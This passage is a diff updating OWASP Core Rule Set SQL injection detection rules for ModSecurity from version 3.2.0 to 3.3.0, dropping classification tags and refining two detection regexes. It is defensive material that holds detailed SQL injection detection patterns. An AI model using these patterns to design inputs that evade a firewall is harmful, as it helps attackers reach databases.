ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -368,12 +327,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -400,12 +355,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -432,12 +383,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -475,12 +422,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -514,12 +457,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'attack-sqli',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -554,13 +493,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" @@ -593,13 +528,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\)|\ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -631,13 +562,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?: tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ @@ -672,14 +599,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -705,13 +628,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -740,13 +659,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -762,7 +677,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # to the Regexp::Assemble output: # (?i:ASSEMBLE_OUTPUT) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]|\/\w+;?\s+(?:between|having|select|like|x?or|and|div)\W|\d+\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|--\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|#\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|;\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|\@.+=\s*?\(\s*?select|\d\s+group\s+by.+\(|[^\w]SET\s*?\@\w+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()]|\d(?:\s*?(?:between|like|x?or|and|div)\s*?\d+\s*?[\-+]|\s+group\s+by.+\()|\/\w+;?\s+(?:between|having|select|like|x?or|and|div)\W|--\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|#\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|;\s*?(?:(?:insert|update)\s*?\w{2,}|alter|drop)|\@.+=\s*?\(\s*?select|[^\w]SET\s*?\@\w+))" \ "id:942210,\ phase:2,\ block,\ @@ -775,13 +690,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -794,7 +705,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # to the Regexp::Assemble output: # ASSEMBLE_OUTPUT | s/^(?:/(?i:/ # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w+\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`]\s*?(?:(?:n(?:and|ot)|(?:x?x)?or|between|\|\||and|div|&&)\s+[\s\w]+=\s*?\w+\s*?having\s+|like(?:\s+[\s\w]+=\s*?\w+\s*?having\s+|\W*?[\"'`\d])|[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w|\*\s*?\w+\W+[\"'`])|(?:union\s*?(?:distinct|[(!@]*?|all)?\s*?[([]*?\s*?select|select\s+?[\[\]()\s\w\.,\"'`-]+from)\s+|\w\s+like\s+[\"'`]|find_in_set\s*?\(|like\s*?[\"'`]%)" \ "id:942260,\ phase:2,\ block,\ @@ -807,13 +718,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -839,13 +746,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -871,13 +774,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -911,13 +810,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -945,13 +840,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -973,13 +864,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1010,13 +897,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1039,14 +922,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1069,14 +948,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1102,14 +977,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1142,14 +1013,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1178,14 +1045,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1214,14 +1077,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1259,13 +1118,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1306,13 +1161,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" @@ -1334,13 +1185,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1386,13 +1233,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1428,13 +1271,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1455,13 +1294,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1498,13 +1333,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1530,13 +1361,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1563,13 +1390,9 @@ SecRule ARGS "@rx \W{4}" \ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}'" @@ -1600,13 +1423,9 @@ SecRule REQUEST_BASENAME "@detectSQLi" \ tag:'platform-multi',\ tag:'attack-sqli',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\ - tag:'WASCTC/WASC-19',\ - tag:'OWASP_TOP_10/A1',\ - tag:'OWASP_AppSensor/CIE1',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'CRITICAL',\ 